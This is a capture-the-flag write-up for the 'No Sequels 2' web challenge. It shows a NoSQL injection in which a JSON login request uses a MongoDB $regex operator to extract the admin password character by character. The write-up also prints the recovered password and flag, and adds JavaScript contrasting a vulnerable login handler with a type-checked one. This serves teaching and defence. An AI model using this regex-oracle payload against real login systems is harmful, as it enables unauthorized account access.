Tags: nosql-injection web 

Rating:

# ▼▼▼No Sequels 2 (Web: 80pts, 161/1374 = 11.7%)▼▼▼

```
This is the sequel to No Sequels. You'll see the challenge page once you solve the first one.

Author: SirIan
```

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

## 【exploit】

I used `$regex` to identify the password one character at a time from the beginning, and judged it to be the end once I reached `$`.

```
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 78
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE
Connection: close

{
"username": "admin",
"password": {"$regex": "^congratsyouwin$"}
}
```

password=`congratsyouwin`
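As an added illustration (not the challenge's own code), the server-side pattern that makes a request like the one above work, beside the type check that closes it. `USERS`, `loginUnsafe` and `loginSafe` are hypothetical names, and `fieldMatches` emulates only the two MongoDB behaviours this page relies on, string equality and `$regex`, so no database is needed to run it.

```javascript
// Added example, not from the challenge source. Shows how a login handler that
// hands the JSON body straight to a MongoDB query turns the password field into
// a $regex oracle, and the input type check that prevents it.

// Constructed sample record; the stored password is the one the writeup recovered.
const USERS = [{ username: "admin", password: "congratsyouwin" }];

// Emulates how MongoDB evaluates a field filter for the two cases on this page:
// a plain string is an equality match, an object carrying $regex is a regex match.
function fieldMatches(stored, filter) {
  if (typeof filter === "string") return stored === filter;
  if (filter && typeof filter === "object" && typeof filter.$regex === "string") {
    return new RegExp(filter.$regex).test(stored);
  }
  return false;
}

// Vulnerable pattern: whatever the client sent becomes the query filter, so
// {"$regex": "^c"} is interpreted as an operator rather than as a password,
// and the login result leaks whether the prefix matched.
function loginUnsafe(body) {
  return USERS.some(
    (u) => fieldMatches(u.username, body.username) && fieldMatches(u.password, body.password)
  );
}

// Hardened pattern: credentials must be plain strings before they reach the
// query. Objects, arrays and numbers are rejected up front, so no operator
// can be smuggled in through the JSON body.
function loginSafe(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    throw new TypeError("username and password must be strings");
  }
  return USERS.some((u) => u.username === body.username && u.password === body.password);
}
```

In a real application the password would also be stored hashed, so even an operator that slipped through would have no plaintext to match against.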

---

Sending this password logs in and returns the flag:

`actf{still_no_sql_in_the_sequel}`